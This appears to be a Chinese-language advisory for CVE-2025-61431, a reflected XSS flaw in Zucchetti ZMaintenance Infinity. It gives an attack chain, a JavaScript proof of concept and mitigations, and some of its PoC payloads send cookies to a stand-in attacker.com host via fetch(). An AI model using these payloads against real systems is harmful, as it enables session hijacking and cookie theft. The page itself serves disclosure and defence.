CVE-2025-61431 Zucchetti ZMaintenance 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61431

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Zucchetti ZMaintenance Infinity, Infinity Zucchetti v4.1及更早版本

漏洞概述

CVE-2025-61431是Zucchetti公司开发的ZMaintenance Infinity和Infinity Zucchetti企业级运维管理平台中存在的一个高危安全漏洞。该漏洞为反射型跨站脚本攻击（Reflected XSS）漏洞，存在于/jsp/gsfr_feditorHTML.jsp端点中。攻击者可以利用此漏洞通过精心构造的恶意payload注入到pHtmlSource参数中，当受害者访问包含恶意脚本的链接时，攻击者可以在受害用户的浏览器上下文中执行任意JavaScript代码。由于该漏洞不需要任何认证即可利用（PR:N），且攻击复杂度较低（AC:L），加上需要用户交互（UI:R），攻击者通常通过钓鱼邮件或社交工程手段诱导用户点击恶意链接。成功利用此漏洞可导致会话劫持、敏感信息窃取、恶意内容注入等严重安全问题，对企业数据安全和用户隐私构成威胁。厂商已于2025年6月18日发布安全更新修复此漏洞。

技术细节

该反射型XSS漏洞源于/jsp/gsfr_feditorHTML.jsp端点对用户输入的pHtmlSource参数缺乏充分的输入验证和输出编码。当攻击者构造包含恶意JavaScript代码的payload并作为pHtmlSource参数值发送到该端点时，服务器将用户输入未经安全处理直接反射回响应页面中。由于应用程序未对特殊字符进行HTML实体编码（如将<转化为<，将>转化为>），导致注入的脚本标签和JavaScript代码能够在受害者浏览器中被解析执行。攻击者通常使用<script>alert(document.cookie)</script>或<img src=x onerror=...>等payload触发漏洞。攻击成功的关键在于诱导用户访问攻击者构造的恶意URL，一旦用户点击链接，带有恶意脚本的页面将在用户浏览器中渲染，JavaScript代码即在用户会话上下文中执行，可窃取Cookie、Session令牌或其他敏感信息。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标系统使用Zucchetti ZMaintenance Infinity或Infinity Zucchetti v4.1及更早版本，并定位到存在漏洞的/jsp/gsfr_feditorHTML.jsp端点

STEP 2

Payload Crafting

攻击者构造恶意XSS payload，如<script>alert(document.cookie)</script>，并将其编码后作为pHtmlSource参数值

STEP 3

Social Engineering

攻击者通过钓鱼邮件、即时消息或其他社交工程手段诱导目标用户点击构造好的恶意链接

STEP 4

Trigger Execution

当受害用户访问恶意URL时，服务器将pHtmlSource参数值未经安全处理直接反射回页面，浏览器解析并执行注入的JavaScript代码

STEP 5

Impact

攻击者成功在受害者浏览器上下文中执行JavaScript，可窃取会话Cookie、劫持用户会话、窃取敏感信息或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-61431 PoC - Reflected XSS in Zucchetti ZMaintenance
// Target: /jsp/gsfr_feditorHTML.jsp
// Parameter: pHtmlSource

// Basic XSS PoC
const http = require('http');

// Encode the XSS payload
const xssPayload = '<script>alert(document.domain)</script>';
const encodedPayload = encodeURIComponent(xssPayload);

// Construct the malicious URL
const targetHost = 'target-server.com';
const targetPath = '/jsp/gsfr_feditorHTML.jsp';
const maliciousUrl = `http://${targetHost}${targetPath}?pHtmlSource=${encodedPayload}`;

console.log('[*] CVE-2025-61431 Reflected XSS PoC');
console.log(`[*] Target: ${targetHost}`);
console.log(`[*] Malicious URL: ${maliciousUrl}`);
console.log('[*] Payload: <script>alert(document.domain)</script>');
console.log('\n[*] When victim visits this URL, the JavaScript will execute in their browser context.');
console.log('[*] This can be used to steal cookies, session tokens, or perform actions on behalf of the user.');

// Alternative payloads:
const altPayloads = [
  "<img src=x onerror=fetch('https://attacker.com/steal?cookie='+document.cookie)>",
  "<svg/onload=fetch('https://attacker.com/log?data='+btoa(document.cookie))>",
  "<script>fetch('https://attacker.com/cookie?c='+document.cookie)</script>"
];

console.log('\n[*] Alternative payloads:');
altPayloads.forEach((p, i) => console.log(`    ${i+1}. ${p}`));

影响范围

Zucchetti ZMaintenance Infinity <= v4.1

Infinity Zucchetti <= v4.1

防御指南

临时缓解措施

在厂商发布正式补丁之前，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)或反向代理层面配置规则，对包含<script>、<img>、<svg>等XSS特征字符的请求进行拦截；2) 临时禁用/jsp/gsfr_feditorHTML.jsp端点或限制其访问；3) 加强对用户的安全意识培训，提醒员工不要点击可疑链接；4) 实施严格的输入验证机制，对pHtmlSource参数进行过滤；5) 启用浏览器的XSS过滤器作为额外防护层。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61431
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61431
3 Details https://www.cvedetails.com/cve/CVE-2025-61431/
4 VulDB https://vuldb.com/cve/CVE-2025-61431
5 Link https://gist.github.com/alex-xor/8651dbdd413e4fa7240b0ab1b1845d76
6 Link https://www.zucchetti.it/